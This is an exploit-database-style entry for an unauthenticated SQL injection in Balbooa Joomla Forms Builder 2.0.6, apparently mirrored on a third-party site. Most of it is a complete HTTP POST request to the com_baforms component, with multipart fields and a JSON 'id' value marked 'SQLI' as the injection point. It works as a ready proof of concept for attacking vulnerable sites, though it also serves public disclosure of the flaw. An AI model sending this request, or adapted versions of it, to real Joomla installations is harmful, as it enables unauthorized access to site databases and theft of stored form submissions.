Balbooa Joomla Forms Builder 2.0.6 Exploit, SQL Injection (Unauthenticated)

# Exploit Title: Balbooa Joomla Forms Builder 2.0.6 - SQL Injection (Unauthenticated)
# Date: 24.10.2021
# Exploit Author: blockomat2100
# Vendor Homepage: https://www.balbooa.com/
# Version: 2.0.6
# Tested on: Docker

An example request to trigger the SQL-Injection:

POST /index.php?option=com_baforms HTTP/1.1
Host: localhost
Content-Length: 862
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryTAak6w3vHUykgInT
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: 7b1c9321dbfaa3e34d2c66e9b23b9d21=016d065924684a506c09304ba2a13035
Connection: close

------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="1"

{"1":{"submission_id":0,"form_id":1,"field_id":1,"name":"test.png","filename":"test.png","date":"2021-09-28-17-19-51","id":"SQLI"}}
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="form-id"

1
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="task"

form.message
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="submit-btn"

2
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="page-title"

Home
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="page-url"

http://localhost/
------WebKitFormBoundaryTAak6w3vHUykgInT
Content-Disposition: form-data; name="page-id"

0
------WebKitFormBoundaryTAak6w3vHUykgInT--

All rights reserved nPulse.net 2009 - 2021
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD